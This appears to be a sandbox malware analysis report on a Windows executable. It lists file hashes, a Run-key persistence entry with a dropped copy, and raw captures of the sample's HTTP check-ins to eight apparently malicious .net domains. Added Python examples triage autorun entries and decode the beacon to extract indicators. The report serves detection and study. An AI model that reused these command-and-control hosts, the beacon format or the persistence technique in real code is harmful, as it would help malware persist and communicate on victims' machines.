Analysis Date: 2015-05-12 19:13:11

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: e647e157ffa45a5dda4b22c8e93272e1 sha1: 53cadd30d7049796a3f251e57eafee5b1afad23b size: 297984
Section .rdata md5: 584758a6e9be147d2e6830b80ddfa018 sha1: 8301ded7a0ab245b6416dd722da39dcd225b7ac6 size: 32768
Section (name absent from the report) md5: e30dc4eb166d17f9c7fd0b26b2f95c6c sha1: 22cbc87f02cca432bfd46c992e2eda655205283b size: 96256
Timestamp: 2014-10-30 09:48:54
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLL Computer Drive Acquisition ➝ C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe

↳ C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.tioeo
Creates File: C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\spplpfpk.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe"
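The autorun entry and the dropped copy above share a pattern worth keying on during triage: a Run value whose target sits under the user's Application Data directory, in a directory and file whose names look machine-generated (yjycltzrggggorh, zhkatlqftf). The following Python is an added example, not part of the sandbox report or of the sample: it parses entries in the report's own "key\value ➝ target" shape and scores them on that pattern. The vowel-ratio and consonant-run thresholds and the two benign contrast entries are assumptions made for this example.

```python
"""Triage Run-key entries for the persistence pattern shown above.

Added example, not part of the sandbox report or of the sample.  It flags
autorun values whose target lives under the user's Application Data and
whose directory or file names look machine-generated.  Thresholds and the
two benign contrast entries are assumptions made for this example.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed input in the report's "key\value ➝ target" shape.  The first
# entry is the one observed in this analysis; the other two are invented
# benign entries included for contrast.
RUN_ENTRIES = [
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLL Computer Drive Acquisition"
    r" ➝ C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"
    r" ➝ C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth"
    r" ➝ C:\Program Files\Windows Defender\MSASCuiL.exe",
]

VOWELS = set("aeiou")


def looks_random(token: str, min_len: int = 8,
                 max_vowel_ratio: float = 0.25, consonant_run_limit: int = 5) -> bool:
    """Heuristic for generated names: a long token with almost no vowels or
    with a long run of consonants.  Tuned (by assumption) so the report's
    'yjycltzrggggorh' and 'zhkatlqftf' trip it and ordinary product and
    folder names do not; baseline it against your own fleet before use."""
    letters = [c for c in token.lower() if c.isalpha()]
    if len(letters) < min_len:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return vowel_ratio < max_vowel_ratio or longest >= consonant_run_limit


@dataclass
class Finding:
    value_name: str
    target: str
    in_profile_dir: bool
    random_components: list
    suspicious: bool


def parse_entry(line: str):
    """Split 'key\\value ➝ target' (also accepts '->') into (value name, target)."""
    key, sep, target = line.partition(" ➝ ")
    if not sep:
        key, sep, target = line.partition(" -> ")
    return key.rsplit("\\", 1)[-1], target.strip()


def triage_run_entry(line: str) -> Finding:
    value_name, target = parse_entry(line)
    path = PureWindowsPath(target)
    lowered = target.lower()
    in_profile = "\\application data\\" in lowered or "\\appdata\\" in lowered
    # Directories below the drive letter plus the executable's stem
    components = list(path.parts[1:-1]) + [path.stem]
    random_components = [c for c in components if looks_random(c)]
    return Finding(value_name, target, in_profile, random_components,
                   suspicious=in_profile and bool(random_components))


def triage(entries):
    return [triage_run_entry(e) for e in entries]


if __name__ == "__main__":
    for f in triage(RUN_ENTRIES):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.value_name!r} -> {f.target}  random={f.random_components}")
```

On a live host the entries would come from an export of HKCU\...\CurrentVersion\Run (and the HKLM equivalents) rather than from the report; a hit is a triage lead, not a verdict, since the user-profile location alone is shared with plenty of legitimate software, which is why the heuristic requires both traits together.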

Network Details:
DNS: 85 queries, all Type: A (the queried names are absent from the report)
Flows TCP 192.168.1.1:1031 ➝
Flows TCP 192.168.1.1:1032 ➝
Flows TCP 192.168.1.1:1033 ➝
Flows TCP 192.168.1.1:1034 ➝
Flows TCP 192.168.1.1:1035 ➝
Flows TCP 192.168.1.1:1036 ➝
Flows TCP 192.168.1.1:1037 ➝
Flows TCP 192.168.1.1:1038 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 656c6563 74726963   ..Host: electric
0x00000070 (00112)   64657669 63652e6e 65740d0a 0d0a       device.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 74726164 65736574   ..Host: tradeset
0x00000070 (00112)   746c652e 6e65740d 0a0d0a0a 0d0a       tle.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 73747265 65746465   ..Host: streetde
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a 0d0a       vice.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62657474 65726465   ..Host: betterde
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a 0d0a       vice.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 666c6965 72626566   ..Host: flierbef
0x00000070 (00112)   6f72652e 6e65740d 0a0d0a0a 0d0a       ore.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6e696768 74737072   ..Host: nightspr
0x00000070 (00112)   696e672e 6e65740d 0a0d0a0a 0d0a       ing.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 63617074 61696e73   ..Host: captains
0x00000070 (00112)   75636365 73732e6e 65740d0a 0d0a       uccess.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 656c6563 74726963   ..Host: electric
0x00000070 (00112)   73707269 6e672e6e 65740d0a 0d0a       spring.net....
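Every capture above is the same request differing only in the Host header: GET /index.php?email=calitate@damila.ro&method=post&len over HTTP/1.0 with Connection: close, sent in turn to electricdevice.net, tradesettle.net, streetdevice.net, betterdevice.net, flierbefore.net, nightspring.net, captainsuccess.net and electricspring.net, one per TCP flow. The Python below is an added example, not part of the report or of the sample: it decodes the report's hex dumps back into bytes, parses the HTTP request, matches that beacon shape, and collects the hosts and email value as indicators. The two embedded dumps are copied from the report; which fields the signature keys on is this example's own choice.

```python
"""Decode the report's raw-pcap hex dumps and match the HTTP check-in.

Added example, not part of the sandbox report or of the sample.  It turns
hexdump rows back into bytes, parses the request, and flags the shape seen
in every capture above.  The two dumps are copied from the report; the
field selection in matches_beacon() is this example's own.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Dumps copied from the Raw Pcap section (offset, decimal offset, up to four
# 32-bit hex groups, then an ASCII column).  Only the hex groups are used.
DUMPS = [
    """
    0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
    0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
    0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
    0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
    0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
    0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
    0x00000060 (00096)   0d0a486f 73743a20 656c6563 74726963   ..Host: electric
    0x00000070 (00112)   64657669 63652e6e 65740d0a 0d0a       device.net....
    """,
    """
    0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
    0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
    0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70   mila.ro&method=p
    0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
    0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
    0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
    0x00000060 (00096)   0d0a486f 73743a20 74726164 65736574   ..Host: tradeset
    0x00000070 (00112)   746c652e 6e65740d 0a0d0a0a 0d0a       tle.net.......
    """,
]

HEX_GROUP = re.compile(r"^[0-9a-fA-F]{2,8}$")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild the payload from hexdump rows; the ASCII column is ignored."""
    out = bytearray()
    for line in dump.strip().splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not tokens[0].startswith("0x"):
            continue
        for tok in tokens[2:6]:          # at most four 32-bit groups per row
            if not HEX_GROUP.match(tok) or len(tok) % 2:
                break                    # first non-hex token: ASCII column
            out += bytes.fromhex(tok)
    return bytes(out)


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: request line, headers, query params."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("ascii", errors="replace")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    # keep_blank_values=True so the value-less "len" parameter survives
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    return {"method": method, "path": url.path, "version": version,
            "params": params, "headers": headers}


def matches_beacon(req: dict) -> bool:
    """Shape of the check-in in every capture: GET /index.php with email= and
    method=post, a value-less len, HTTP/1.0 and Connection: close.  The
    combination is the signature; any single field alone is too generic."""
    p = req["params"]
    return (req["method"] == "GET" and req["path"] == "/index.php"
            and req["version"] == "HTTP/1.0"
            and "email" in p and p.get("method") == "post" and p.get("len") == ""
            and req["headers"].get("connection", "").lower() == "close")


def extract_iocs(dumps):
    """Return (sorted beacon hosts, sorted email parameters) from matching dumps."""
    hosts, emails = set(), set()
    for dump in dumps:
        req = parse_http_request(hexdump_to_bytes(dump))
        if matches_beacon(req) and "host" in req["headers"]:
            hosts.add(req["headers"]["host"])
            emails.add(req["params"]["email"])
    return sorted(hosts), sorted(emails)


if __name__ == "__main__":
    hosts, emails = extract_iocs(DUMPS)
    print("beacon hosts:", hosts)
    print("email parameter:", emails)
```

Run over all eight dumps the host list becomes the network indicator set for this sample; the email value, the HTTP/1.0 version and the bare len parameter are what distinguish the beacon from ordinary index.php traffic, so a network signature should require them together rather than matching on the path or the domains alone.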

Strings:

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
`Base Class Array'
`Base Class Descriptor at (
`Class Hierarchy Descriptor'
`Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
Rougncei rjsopeo gop hbj jpodeauif scjers bgu mgruncr gjsuek svjihacnan mcoco loojsuz jesabounm uuaif jfje acmjuijef ainhwa pavusoohmr cdug jftu askuofoj aqwumadmm dfh xlgizni pgt bsnuty msn vgjorkwoj eqsc sfisu rpfanuiffe lsb xtye dtacagtdec etuyrezfsu egm dedsutf ksbodb jmbuglcidd aocperuld poqviiens zncadspi jjjarbmi oacyjaurct jaud ciigfiab olssigno tcilag dccucisle cnbuhfup vmag hajr ncmoftpics zcm jsfuslham apdekobe qvp dillosbc pkjannfi ldguso jzxoljuk zppicjse dedbivgcu bntihlmuf ssc tccaoahlej jnsucnf adcg fnoc gnnaibby hfwipplo lwezofamr oxdrupcicu jcc lfn jgeojaivs emgber hntasusn mvlicfcu ljhefhdeb lmpa enbj adm ugzvi cjadeo nnekulg uogluco xlciqpx eboialpe tarjo fmebu rwlad bsyecnumig mxkiuacpci ckj gklombl btjeaaglwi ctfudce pov uunepruo lcpozauh oclj spcall yfgoljahic jjwiiimn jci fgp tpliekmje vgfeonnbu fgmuihjfee uldi vrawanosi jkl xmliy fgifosfci ntutuijmma dymaibv ydsuxlrun jbpogm ifdze yvvobfbufd ztsar drfaen fmj sirt hamlao lerzoep pftug olghefqo rurji nevgutpul mdfucju aqaluvub lrcat ndg zpduavugl ofosmiv nki shxebdupiq jarwelzy jsjul enspef tmkogbc dgcecd epojtaflb arl pcn canmastmaj hkbuqtdu ldkapefje xinihid wsg gcmiznr xnr pdlo cnkawdpus wdfag hldeeuubdp dxrisnt cgjucople giujmijga qigb wvbilij jmbiffdu qbhike esf llecij cfdirpc fwfe lcc pcyo mbemupdk dhpobmnal lpeguqwcom jmeivip bscossbi dfsud begxupnos ddnuuhqupu ucebgeuwvf ecmnobeb vxm laa inetmo irjvuobqs ozvol lbbonbdun vedisa rbsojedm pdduhonge nlg fxjo qepru uajayze kdjegxnu xfnonnr bjpa ifohbefitb gorajaih pxmecgda mkgukslez abrufutfme dmvucld mdqintgu wtluzdxapd xkjajhfaj dce zbimiicdlu gjrumm wrpumib ngexemn cfduefem hcgacn fiauffo pfmaifd ftaluit cctudifel uojcdoot bepogef vlbaiafrti ddjepjt cjcuj jtmoj pvdeczp hzuju vjsegulnu tdyic uznf odcieeino zfve cimfiid mgjagpd vealugaenm uefsjaz fajx qjcogjtec pfs dkpudvk avdilu abgenekyv xmh fetc ilbfuhleo
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
`Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
